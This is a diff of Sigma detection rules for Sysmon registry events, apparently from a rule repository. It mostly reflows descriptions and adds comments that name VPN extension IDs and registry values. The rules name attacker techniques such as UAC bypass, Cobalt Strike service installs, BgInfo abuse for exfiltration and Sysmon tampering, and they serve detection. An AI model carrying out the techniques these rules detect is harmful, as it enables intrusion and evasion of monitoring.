autorun keys for legitimate reason level: medium ruletype: Sigma diff --git a/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml b/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml index 3d65758d7..bfd1ffbed 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml @@ -1,16 +1,15 @@ title: Wow6432Node Windows NT CurrentVersion Autorun Keys Modification id: 480421f9-417f-4d3b-9552-fd2728443ec8 related: - - id: 17f878b8-9968-4578-b814-c4217fc5768c - type: obsoletes + - id: 17f878b8-9968-4578-b814-c4217fc5768c + type: obsoletes status: experimental description: Detects modification of autostart extensibility point (ASEP) in registry. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md - https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns - - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d -author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, - oscd.community, Tim Shelton, frack113 (split) + - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys +author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) date: 2019/10/25 modified: 2023/08/17 tags: @@ -34,18 +33,15 @@ detection: filter: Details: - (Empty) - - \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image - File Execution Options - condition: registry_set and (wow_nt_current_version_base and wow_nt_current_version - and not filter) + - \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options + condition: registry_set and (wow_nt_current_version_base and wow_nt_current_version and not filter) fields: - SecurityID - ObjectName - OldValueType - NewValueType falsepositives: - - Legitimate software automatically (mostly, during installation) sets up autorun - keys for legitimate reason + - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason - Legitimate administrator sets up autorun keys for legitimate reason level: medium ruletype: Sigma diff --git a/sigma/sysmon/registry/registry_set/registry_set_bginfo_custom_db.yml b/sigma/sysmon/registry/registry_set/registry_set_bginfo_custom_db.yml index 48dd6c2b4..c845e8670 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_bginfo_custom_db.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_bginfo_custom_db.yml @@ -1,9 +1,7 @@ title: New BgInfo.EXE Custom DB Path Registry Configuration id: 53330955-dc52-487f-a3a2-da24dcff99b5 status: experimental -description: Detects setting of a new registry database value related to BgInfo configuration. - Attackers can for example set this value to save the results of the commands executed - by BgInfo in order to exfiltrate information. +description: Detects setting of a new registry database value related to BgInfo configuration. Attackers can for example set this value to save the results of the commands executed by BgInfo in order to exfiltrate information. references: - Internal Research author: Nasreddine Bencherchali (Nextron Systems) @@ -20,7 +18,7 @@ detection: EventID: 13 Channel: Microsoft-Windows-Sysmon/Operational selection: - EventType: SetValue + EventType: SetValue TargetObject|endswith: \Software\Winternals\BGInfo\Database condition: registry_set and selection falsepositives: diff --git a/sigma/sysmon/registry/registry_set/registry_set_bginfo_custom_vbscript.yml b/sigma/sysmon/registry/registry_set/registry_set_bginfo_custom_vbscript.yml index 9301435f7..b34aa38a8 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_bginfo_custom_vbscript.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_bginfo_custom_vbscript.yml @@ -1,11 +1,10 @@ title: New BgInfo.EXE Custom VBScript Registry Configuration id: 992dd79f-dde8-4bb0-9085-6350ba97cfb3 related: - - id: cd277474-5c52-4423-a52b-ac2d7969902f - type: similar + - id: cd277474-5c52-4423-a52b-ac2d7969902f + type: similar status: experimental -description: Detects setting of a new registry value related to BgInfo configuration, - which can be abused to execute custom VBScript via "BgInfo.exe" +description: Detects setting of a new registry value related to BgInfo configuration, which can be abused to execute custom VBScript via "BgInfo.exe" references: - Internal Research author: Nasreddine Bencherchali (Nextron Systems) @@ -22,9 +21,9 @@ detection: EventID: 13 Channel: Microsoft-Windows-Sysmon/Operational selection: - EventType: SetValue + EventType: SetValue TargetObject|contains: \Software\Winternals\BGInfo\UserFields\ - Details|startswith: '4' + Details|startswith: '4' # WMI condition: registry_set and selection falsepositives: - Legitimate VBScript diff --git a/sigma/sysmon/registry/registry_set/registry_set_bginfo_custom_wmi_query.yml b/sigma/sysmon/registry/registry_set/registry_set_bginfo_custom_wmi_query.yml index 925672efa..97ef4e312 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_bginfo_custom_wmi_query.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_bginfo_custom_wmi_query.yml @@ -1,11 +1,10 @@ title: New BgInfo.EXE Custom WMI Query Registry Configuration id: cd277474-5c52-4423-a52b-ac2d7969902f related: - - id: 992dd79f-dde8-4bb0-9085-6350ba97cfb3 - type: similar + - id: 992dd79f-dde8-4bb0-9085-6350ba97cfb3 + type: similar status: experimental -description: Detects setting of a new registry value related to BgInfo configuration, - which can be abused to execute custom WMI query via "BgInfo.exe" +description: Detects setting of a new registry value related to BgInfo configuration, which can be abused to execute custom WMI query via "BgInfo.exe" references: - Internal Research author: Nasreddine Bencherchali (Nextron Systems) @@ -22,9 +21,9 @@ detection: EventID: 13 Channel: Microsoft-Windows-Sysmon/Operational selection: - EventType: SetValue + EventType: SetValue TargetObject|contains: \Software\Winternals\BGInfo\UserFields\ - Details|startswith: '6' + Details|startswith: '6' # WMI condition: registry_set and selection falsepositives: - Legitimate WMI query diff --git a/sigma/sysmon/registry/registry_set/registry_set_blackbyte_ransomware.yml b/sigma/sysmon/registry/registry_set/registry_set_blackbyte_ransomware.yml index 2c5a3d4fb..fdefa242c 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_blackbyte_ransomware.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_blackbyte_ransomware.yml @@ -1,8 +1,7 @@ title: Blackbyte Ransomware Registry id: 83314318-052a-4c90-a1ad-660ece38d276 status: test -description: BlackByte set three different registry values to escalate privileges - and begin setting the stage for lateral movement and encryption +description: BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption references: - https://redcanary.com/blog/blackbyte-ransomware/?utm_source=twitter&utm_medium=social - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/blackbyte-ransomware-pt-1-in-depth-analysis/ diff --git a/sigma/sysmon/registry/registry_set/registry_set_bypass_uac_using_eventviewer.yml b/sigma/sysmon/registry/registry_set/registry_set_bypass_uac_using_eventviewer.yml index f6efa7c1d..631ca297c 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_bypass_uac_using_eventviewer.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_bypass_uac_using_eventviewer.yml @@ -1,8 +1,7 @@ title: Bypass UAC Using Event Viewer id: 674202d0-b22a-4af4-ae5f-2eda1f3da1af status: experimental -description: Bypasses User Account Control using Event Viewer and a relevant Windows - Registry modification +description: Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification references: - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-1---bypass-uac-using-event-viewer-cmd diff --git a/sigma/sysmon/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task.yml b/sigma/sysmon/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task.yml index 35657e3f3..cfa5992c4 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task.yml @@ -1,9 +1,7 @@ title: Bypass UAC Using SilentCleanup Task id: 724ea201-6514-4f38-9739-e5973c34f49a status: test -description: There is an auto-elevated task called SilentCleanup located in %windir%\system32\cleanmgr.exe - This can be abused to elevate any file with Administrator privileges without prompting - UAC +description: There is an auto-elevated task called SilentCleanup located in %windir%\system32\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-9---bypass-uac-using-silentcleanup-task - https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/ diff --git a/sigma/sysmon/registry/registry_set/registry_set_change_rdp_port.yml b/sigma/sysmon/registry/registry_set/registry_set_change_rdp_port.yml index 7ebb18ce1..77226fad2 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_change_rdp_port.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_change_rdp_port.yml @@ -1,15 +1,10 @@ title: Changing RDP Port to Non Standard Number id: 509e84b9-a71a-40e0-834f-05470369bd1e status: test -description: 'Remote desktop is a common feature in operating systems. - - It allows a user to log into an interactive session with a system desktop graphical - user interface on a remote system. - - Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as - Remote Desktop Services (RDS). - - ' +description: | + Remote desktop is a common feature in operating systems. + It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. + Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS). references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#atomic-test-1---rdp-to-domaincontroller author: frack113 diff --git a/sigma/sysmon/registry/registry_set/registry_set_change_security_zones.yml b/sigma/sysmon/registry/registry_set/registry_set_change_security_zones.yml index e9063aeb6..0220304a8 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_change_security_zones.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_change_security_zones.yml @@ -1,8 +1,8 @@ title: IE Change Domain Zone id: 45e112d0-7759-4c2a-aa36-9f8fb79d3393 related: - - id: d88d0ab2-e696-4d40-a2ed-9790064e66b3 - type: derived + - id: d88d0ab2-e696-4d40-a2ed-9790064e66b3 + type: derived status: experimental description: Hides the file extension through modification of the registry references: @@ -23,12 +23,11 @@ detection: EventID: 13 Channel: Microsoft-Windows-Sysmon/Operational selection_domains: - TargetObject|contains: \SOFTWARE\Microsoft\Windows\CurrentVersion\Internet - Settings\ZoneMap\Domains\ + TargetObject|contains: \SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\ filter: Details: - - DWORD (0x00000000) - - DWORD (0x00000001) + - DWORD (0x00000000) # My Computer + - DWORD (0x00000001) # Local Intranet Zone - (Empty) condition: registry_set and (selection_domains and not filter) falsepositives: diff --git a/sigma/sysmon/registry/registry_set/registry_set_change_sysmon_driver_altitude.yml b/sigma/sysmon/registry/registry_set/registry_set_change_sysmon_driver_altitude.yml index 7ce5242ad..89686562d 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_change_sysmon_driver_altitude.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_change_sysmon_driver_altitude.yml @@ -1,9 +1,7 @@ title: Disable Sysmon Event Logging Via Registry id: 4916a35e-bfc4-47d0-8e25-a003d7067061 status: experimental -description: Detects changes in Sysmon driver altitude. If the Sysmon driver is configured - to load at an altitude of another registered service, it will fail to load at - boot. +description: Detects changes in Sysmon driver altitude. If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot. references: - https://posts.specterops.io/shhmon-silencing-sysmon-via-driver-unload-682b5be57650 - https://youtu.be/zSihR3lTf7g diff --git a/sigma/sysmon/registry/registry_set/registry_set_change_winevt_channelaccess.yml b/sigma/sysmon/registry/registry_set/registry_set_change_winevt_channelaccess.yml index 927831482..3f53d0dc5 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_change_winevt_channelaccess.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_change_winevt_channelaccess.yml @@ -1,8 +1,7 @@ title: Change Winevt Event Access Permission Via Registry id: 7d9263bd-dc47-4a58-bc92-5474abab390c status: experimental -description: Detects tampering with the "ChannelAccess" registry key in order to change - access to Windows event channel +description: Detects tampering with the "ChannelAccess" registry key in order to change access to Windows event channel references: - https://app.any.run/tasks/77b2e328-8f36-46b2-b2e2-8a80398217ab/ - https://learn.microsoft.com/en-us/windows/win32/api/winevt/ @@ -24,10 +23,11 @@ detection: selection: TargetObject|startswith: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\ TargetObject|endswith: \ChannelAccess + # Add more interesting combinations if you found them Details|contains: - - (A;;0x1;;;SY) - - (A;;0x5;;;BA) - - (A;;0x1;;;LA) + - (A;;0x1;;;SY) # Local System having GENERIC ALL + - (A;;0x5;;;BA) # Built-in administrators having GENERIC ALL and GENERIC WRITE + - (A;;0x1;;;LA) # Local administrator having GENERIC ALL filter_trustedinstaller: Image: C:\Windows\servicing\TrustedInstaller.exe filter_ti_worker: diff --git a/sigma/sysmon/registry/registry_set/registry_set_chrome_extension.yml b/sigma/sysmon/registry/registry_set/registry_set_chrome_extension.yml index ba21d52b5..e055aed4b 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_chrome_extension.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_chrome_extension.yml @@ -23,112 +23,112 @@ detection: TargetObject|endswith: update_url chrome_vpn: TargetObject|contains: - - fdcgdnkidjaadafnichfpabhfomcebme - - fcfhplploccackoneaefokcmbjfbkenj - - bihmplhobchoageeokmgbdihknkjbknd - - gkojfkhlekighikafcpjkiklfbnlmeio - - jajilbjjinjmgcibalaakngmkilboobh - - gjknjjomckknofjidppipffbpoekiipm - - nabbmpekekjknlbkgpodfndbodhijjem - - kpiecbcckbofpmkkkdibbllpinceiihk - - nlbejmccbhkncgokjcmghpfloaajcffj - - omghfjlpggmjjaagoclmmobgdodcjboh - - bibjcjfmgapbfoljiojpipaooddpkpai - - mpcaainmfjjigeicjnlkdfajbioopjko - - jljopmgdobloagejpohpldgkiellmfnc - - lochiccbgeohimldjooaakjllnafhaid - - nhnfcgpcbfclhfafjlooihdfghaeinfc - - ookhnhpkphagefgdiemllfajmkdkcaim - - namfblliamklmeodpcelkokjbffgmeoo - - nbcojefnccbanplpoffopkoepjmhgdgh - - majdfhpaihoncoakbjgbdhglocklcgno - - lnfdmdhmfbimhhpaeocncdlhiodoblbd - - eppiocemhmnlbhjplcgkofciiegomcon - - cocfojppfigjeefejbpfmedgjbpchcng - - foiopecknacmiihiocgdjgbjokkpkohc - - hhdobjgopfphlmjbmnpglhfcgppchgje - - jgbaghohigdbgbolncodkdlpenhcmcge - - inligpkjkhbpifecbdjhmdpcfhnlelja - - higioemojdadgdbhbbbkfbebbdlfjbip - - hipncndjamdcmphkgngojegjblibadbe - - iolonopooapdagdemdoaihahlfkncfgg - - nhfjkakglbnnpkpldhjmpmmfefifedcj - - jpgljfpmoofbmlieejglhonfofmahini - - fgddmllnllkalaagkghckoinaemmogpe - - ejkaocphofnobjdedneohbbiilggdlbi - - keodbianoliadkoelloecbhllnpiocoi - - hoapmlpnmpaehilehggglehfdlnoegck - - poeojclicodamonabcabmapamjkkmnnk - - dfkdflfgjdajbhocmfjolpjbebdkcjog - - kcdahmgmaagjhocpipbodaokikjkampi - - klnkiajpmpkkkgpgbogmcgfjhdoljacg - - lneaocagcijjdpkcabeanfpdbmapcjjg - - pgfpignfckbloagkfnamnolkeaecfgfh - - jplnlifepflhkbkgonidnobkakhmpnmh - - jliodmnojccaloajphkingdnpljdhdok - - hnmpcagpplmpfojmgmnngilcnanddlhb - - ffbkglfijbcbgblgflchnbphjdllaogb - - kcndmbbelllkmioekdagahekgimemejo - - jdgilggpfmjpbodmhndmhojklgfdlhob - - bihhflimonbpcfagfadcnbbdngpopnjb - - ppajinakbfocjfnijggfndbdmjggcmde - - oofgbpoabipfcfjapgnbbjjaenockbdp - - bhnhkdgoefpmekcgnccpnhjfdgicfebm - - knmmpciebaoojcpjjoeonlcjacjopcpf - - dhadilbmmjiooceioladdphemaliiobo - - jedieiamjmoflcknjdjhpieklepfglin - - mhngpdlhojliikfknhfaglpnddniijfh - - omdakjcmkglenbhjadbccaookpfjihpa - - npgimkapccfidfkfoklhpkgmhgfejhbj - - akeehkgglkmpapdnanoochpfmeghfdln - - gbmdmipapolaohpinhblmcnpmmlgfgje - - aigmfoeogfnljhnofglledbhhfegannp - - cgojmfochfikphincbhokimmmjenhhgk - - ficajfeojakddincjafebjmfiefcmanc - - ifnaibldjfdmaipaddffmgcmekjhiloa - - jbnmpdkcfkochpanomnkhnafobppmccn - - apcfdffemoinopelidncddjbhkiblecc - - mjolnodfokkkaichkcjipfgblbfgojpa - - oifjbnnafapeiknapihcmpeodaeblbkn - - plpmggfglncceinmilojdkiijhmajkjh - - mjnbclmflcpookeapghfhapeffmpodij - - bblcccknbdbplgmdjnnikffefhdlobhp - - aojlhgbkmkahabcmcpifbolnoichfeep - - lcmammnjlbmlbcaniggmlejfjpjagiia - - knajdeaocbpmfghhmijicidfcmdgbdpm - - bdlcnpceagnkjnjlbbbcepohejbheilk - - edknjdjielmpdlnllkdmaghlbpnmjmgb - - eidnihaadmmancegllknfbliaijfmkgo - - ckiahbcmlmkpfiijecbpflfahoimklke - - macdlemfnignjhclfcfichcdhiomgjjb - - chioafkonnhbpajpengbalkececleldf - - amnoibeflfphhplmckdbiajkjaoomgnj - - llbhddikeonkpbhpncnhialfbpnilcnc - - pcienlhnoficegnepejpfiklggkioccm - - iocnglnmfkgfedpcemdflhkchokkfeii - - igahhbkcppaollcjeaaoapkijbnphfhb - - njpmifchgidinihmijhcfpbdmglecdlb - - ggackgngljinccllcmbgnpgpllcjepgc - - kchocjcihdgkoplngjemhpplmmloanja - - bnijmipndnicefcdbhgcjoognndbgkep - - lklekjodgannjcccdlbicoamibgbdnmi - - dbdbnchagbkhknegmhgikkleoogjcfge - - egblhcjfjmbjajhjhpmnlekffgaemgfh - - ehbhfpfdkmhcpaehaooegfdflljcnfec - - bkkgdjpomdnfemhhkalfkogckjdkcjkg - - almalgbpmcfpdaopimbdchdliminoign - - akkbkhnikoeojlhiiomohpdnkhbkhieh - - gbfgfbopcfokdpkdigfmoeaajfmpkbnh - - bniikohfmajhdcffljgfeiklcbgffppl - - lejgfmmlngaigdmmikblappdafcmkndb - - ffhhkmlgedgcliajaedapkdfigdobcif - - gcknhkkoolaabfmlnjonogaaifnjlfnp - - pooljnboifbodgifngpppfklhifechoe - - fjoaledfpmneenckfbpdfhkmimnjocfa - - aakchaleigkohafkfjfjbblobjifikek - - dpplabbmogkhghncfbfdeeokoefdjegm - - padekgcemlokbadohgkifijomclgjgif - - bfidboloedlamgdmenmlbipfnccokknp + - fdcgdnkidjaadafnichfpabhfomcebme # ZenMate VPN + - fcfhplploccackoneaefokcmbjfbkenj # 1clickVPN + - bihmplhobchoageeokmgbdihknkjbknd # Touch VPN + - gkojfkhlekighikafcpjkiklfbnlmeio # Hola Free VPN + - jajilbjjinjmgcibalaakngmkilboobh # Astar VPN + - gjknjjomckknofjidppipffbpoekiipm # VPN Free + - nabbmpekekjknlbkgpodfndbodhijjem # Earth VPN + - kpiecbcckbofpmkkkdibbllpinceiihk # DotVPN + - nlbejmccbhkncgokjcmghpfloaajcffj # Hotspot Shield Free VPN + - omghfjlpggmjjaagoclmmobgdodcjboh # Browsec VPN + - bibjcjfmgapbfoljiojpipaooddpkpai # VPN-free.pro + - mpcaainmfjjigeicjnlkdfajbioopjko # VPN Unlimited Free + - jljopmgdobloagejpohpldgkiellmfnc # PP VPN + - lochiccbgeohimldjooaakjllnafhaid # IP Unblock + - nhnfcgpcbfclhfafjlooihdfghaeinfc # Surf VPN + - ookhnhpkphagefgdiemllfajmkdkcaim # iNinja VPN + - namfblliamklmeodpcelkokjbffgmeoo # Daily VPN + - nbcojefnccbanplpoffopkoepjmhgdgh # Hoxx VPN Proxy + - majdfhpaihoncoakbjgbdhglocklcgno # Free VPN + - lnfdmdhmfbimhhpaeocncdlhiodoblbd # VPN PROXY MASTER + - eppiocemhmnlbhjplcgkofciiegomcon # Urban Free VPN + - cocfojppfigjeefejbpfmedgjbpchcng # SaferVPN Proxy + - foiopecknacmiihiocgdjgbjokkpkohc # VPN Professional + - hhdobjgopfphlmjbmnpglhfcgppchgje # AdGuard VPN + - jgbaghohigdbgbolncodkdlpenhcmcge # Free VPN + - inligpkjkhbpifecbdjhmdpcfhnlelja # Free One Touch VPN + - higioemojdadgdbhbbbkfbebbdlfjbip # Unlimited VPN & Proxy by ibVPN + - hipncndjamdcmphkgngojegjblibadbe # RusVPN + - iolonopooapdagdemdoaihahlfkncfgg # Azino VPN + - nhfjkakglbnnpkpldhjmpmmfefifedcj # Pron VPN + - jpgljfpmoofbmlieejglhonfofmahini # Free Residential VPN + - fgddmllnllkalaagkghckoinaemmogpe # ExpressVPN + - ejkaocphofnobjdedneohbbiilggdlbi # Hotspot Shield Elite VPN Proxy + - keodbianoliadkoelloecbhllnpiocoi # Hide My IP VPN + - hoapmlpnmpaehilehggglehfdlnoegck # Tunnello VPN + - poeojclicodamonabcabmapamjkkmnnk # HMA VPN Proxy Unblocker + - dfkdflfgjdajbhocmfjolpjbebdkcjog # Free Avira Phantom VPN + - kcdahmgmaagjhocpipbodaokikjkampi # Hola VPN + - klnkiajpmpkkkgpgbogmcgfjhdoljacg # Free VPN for Chrome + - lneaocagcijjdpkcabeanfpdbmapcjjg # Hub VPN + - pgfpignfckbloagkfnamnolkeaecfgfh # Free Proxy VPN + - jplnlifepflhkbkgonidnobkakhmpnmh # Private Internet Access + - jliodmnojccaloajphkingdnpljdhdok # Turbo VPN for PC + - hnmpcagpplmpfojmgmnngilcnanddlhb # Windscribe + - ffbkglfijbcbgblgflchnbphjdllaogb # CyberGhost VPN + - kcndmbbelllkmioekdagahekgimemejo # VPN.AC + - jdgilggpfmjpbodmhndmhojklgfdlhob # Browser VPN + - bihhflimonbpcfagfadcnbbdngpopnjb # DEEPRISM VPN + - ppajinakbfocjfnijggfndbdmjggcmde # My Browser Vpn + - oofgbpoabipfcfjapgnbbjjaenockbdp # SetupVPN + - bhnhkdgoefpmekcgnccpnhjfdgicfebm # Wachee VPN + - knmmpciebaoojcpjjoeonlcjacjopcpf # Thunder Proxy + - dhadilbmmjiooceioladdphemaliiobo # Free Proxy VPN + - jedieiamjmoflcknjdjhpieklepfglin # FastestVPN Proxy + - mhngpdlhojliikfknhfaglpnddniijfh # WorkingVPN + - omdakjcmkglenbhjadbccaookpfjihpa # TunnelBear VPN + - npgimkapccfidfkfoklhpkgmhgfejhbj # BelkaVPN + - akeehkgglkmpapdnanoochpfmeghfdln # VPN Master + - gbmdmipapolaohpinhblmcnpmmlgfgje # Unblock Websites + - aigmfoeogfnljhnofglledbhhfegannp # Lethean Proxy VPN + - cgojmfochfikphincbhokimmmjenhhgk # Whoer VPN + - ficajfeojakddincjafebjmfiefcmanc # Best VPN USA + - ifnaibldjfdmaipaddffmgcmekjhiloa # FREE VPN DEWELOPMENT + - jbnmpdkcfkochpanomnkhnafobppmccn # apkfold free vpn + - apcfdffemoinopelidncddjbhkiblecc # Soul VPN + - mjolnodfokkkaichkcjipfgblbfgojpa # DotVPN + - oifjbnnafapeiknapihcmpeodaeblbkn # rderzh VPN Proxy + - plpmggfglncceinmilojdkiijhmajkjh # Red Panda VPN + - mjnbclmflcpookeapghfhapeffmpodij # Ultrareach VPN + - bblcccknbdbplgmdjnnikffefhdlobhp # FastStunnel VPN + - aojlhgbkmkahabcmcpifbolnoichfeep # VirtualShield VPN + - lcmammnjlbmlbcaniggmlejfjpjagiia # Adblock Office VPN Proxy Server + - knajdeaocbpmfghhmijicidfcmdgbdpm # Guru VPN & Proxy + - bdlcnpceagnkjnjlbbbcepohejbheilk # Malus VPN + - edknjdjielmpdlnllkdmaghlbpnmjmgb # Muscle VPN + - eidnihaadmmancegllknfbliaijfmkgo # Push VPN + - ckiahbcmlmkpfiijecbpflfahoimklke # Gom VPN + - macdlemfnignjhclfcfichcdhiomgjjb # Free Fast VPN + - chioafkonnhbpajpengbalkececleldf # BullVPN + - amnoibeflfphhplmckdbiajkjaoomgnj # HideAll VPN + - llbhddikeonkpbhpncnhialfbpnilcnc # ProxyFlow + - pcienlhnoficegnepejpfiklggkioccm # Cloud VPN + - iocnglnmfkgfedpcemdflhkchokkfeii # sVPN + - igahhbkcppaollcjeaaoapkijbnphfhb # Social VPN + - njpmifchgidinihmijhcfpbdmglecdlb # Trellonet Trellonet + - ggackgngljinccllcmbgnpgpllcjepgc # WindmillVPN + - kchocjcihdgkoplngjemhpplmmloanja # IPBurger Proxy & VPN + - bnijmipndnicefcdbhgcjoognndbgkep # Veee + - lklekjodgannjcccdlbicoamibgbdnmi # Anonymous Proxy Vpn Browser + - dbdbnchagbkhknegmhgikkleoogjcfge # Hideman VPN + - egblhcjfjmbjajhjhpmnlekffgaemgfh # Fornex VPN + - ehbhfpfdkmhcpaehaooegfdflljcnfec # WeVPN + - bkkgdjpomdnfemhhkalfkogckjdkcjkg # VPNMatic + - almalgbpmcfpdaopimbdchdliminoign # Urban Shield + - akkbkhnikoeojlhiiomohpdnkhbkhieh # Prime VPN + - gbfgfbopcfokdpkdigfmoeaajfmpkbnh # westwind + - bniikohfmajhdcffljgfeiklcbgffppl # Upnet + - lejgfmmlngaigdmmikblappdafcmkndb # uVPN + - ffhhkmlgedgcliajaedapkdfigdobcif # Nucleus VPN + - gcknhkkoolaabfmlnjonogaaifnjlfnp # FoxyProxy Standard + - pooljnboifbodgifngpppfklhifechoe # GeoProxy + - fjoaledfpmneenckfbpdfhkmimnjocfa # NordVPN + - aakchaleigkohafkfjfjbblobjifikek # ProxFlow + - dpplabbmogkhghncfbfdeeokoefdjegm # Proxy SwitchySharp + - padekgcemlokbadohgkifijomclgjgif # Proxy SwitchyOmega + - bfidboloedlamgdmenmlbipfnccokknp # PureVPN condition: registry_set and (all of chrome_*) falsepositives: - Unknown diff --git a/sigma/sysmon/registry/registry_set/registry_set_clickonce_trust_prompt.yml b/sigma/sysmon/registry/registry_set/registry_set_clickonce_trust_prompt.yml index 37c6fd5ce..9e25b3087 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_clickonce_trust_prompt.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_clickonce_trust_prompt.yml @@ -1,8 +1,7 @@ title: ClickOnce Trust Prompt Tampering id: ac9159cc-c364-4304-8f0a-d63fc1a0aabb status: experimental -description: Detects changes to the ClickOnce trust prompt registry key in order to - enable an installation from different locations such as the Internet. +description: Detects changes to the ClickOnce trust prompt registry key in order to enable an installation from different locations such as the Internet. references: - https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5 - https://learn.microsoft.com/en-us/visualstudio/deployment/how-to-configure-the-clickonce-trust-prompt-behavior diff --git a/sigma/sysmon/registry/registry_set/registry_set_cobaltstrike_service_installs.yml b/sigma/sysmon/registry/registry_set/registry_set_cobaltstrike_service_installs.yml index bb3c77777..ff53200a4 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_cobaltstrike_service_installs.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_cobaltstrike_service_installs.yml @@ -1,16 +1,10 @@ title: CobaltStrike Service Installations in Registry id: 61a7697c-cb79-42a8-a2ff-5f0cdfae0130 status: test -description: 'Detects known malicious service installs that appear in cases in which - a Cobalt Strike beacon elevates privileges or lateral movement. - +description: | + Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement. We can also catch this by system log 7045 (https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/win_cobaltstrike_service_installs.yml) - - In some SIEM you can catch those events also in HKLM\System\ControlSet001\Services - or HKLM\System\ControlSet002\Services, however, this rule is based on a regular - sysmon''s events. - - ' + In some SIEM you can catch those events also in HKLM\System\ControlSet001\Services or HKLM\System\ControlSet002\Services, however, this rule is based on a regular sysmon's events. references: - https://www.sans.org/webcasts/tech-tuesday-workshop-cobalt-strike-detection-log-analysis-119395 author: Wojciech Lesicki diff --git a/sigma/sysmon/registry/registry_set/registry_set_creation_service_susp_folder.yml b/sigma/sysmon/registry/registry_set/registry_set_creation_service_susp_folder.yml index 98b63207b..45fa73ee8 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_creation_service_susp_folder.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_creation_service_susp_folder.yml @@ -1,11 +1,10 @@ title: Service Binary in Suspicious Folder id: a07f0359-4c90-4dc4-a681-8ffea40b4f47 related: - - id: c0abc838-36b0-47c9-b3b3-a90c39455382 - type: obsoletes + - id: c0abc838-36b0-47c9-b3b3-a90c39455382 + type: obsoletes status: experimental -description: Detect the creation of a service with a service binary located in a suspicious - directory +description: Detect the creation of a service with a service binary located in a suspicious directory references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md author: Florian Roth (Nextron Systems), frack113 @@ -31,9 +30,10 @@ detection: - \ADMIN$\ - \Temp\ Details: - - DWORD (0x00000000) - - DWORD (0x00000001) - - DWORD (0x00000002) + - DWORD (0x00000000) # boot + - DWORD (0x00000001) # System + - DWORD (0x00000002) # Automatic + # 3 - Manual , 4 - Disabled selection_2: TargetObject|startswith: HKLM\System\CurrentControlSet\Services\ TargetObject|endswith: \ImagePath @@ -43,7 +43,7 @@ detection: - \ADMIN$\ - \Temp\ filter_1: - Image|contains|all: + Image|contains|all: # Filter FP with Avast software - \Common Files\ - \Temp\ 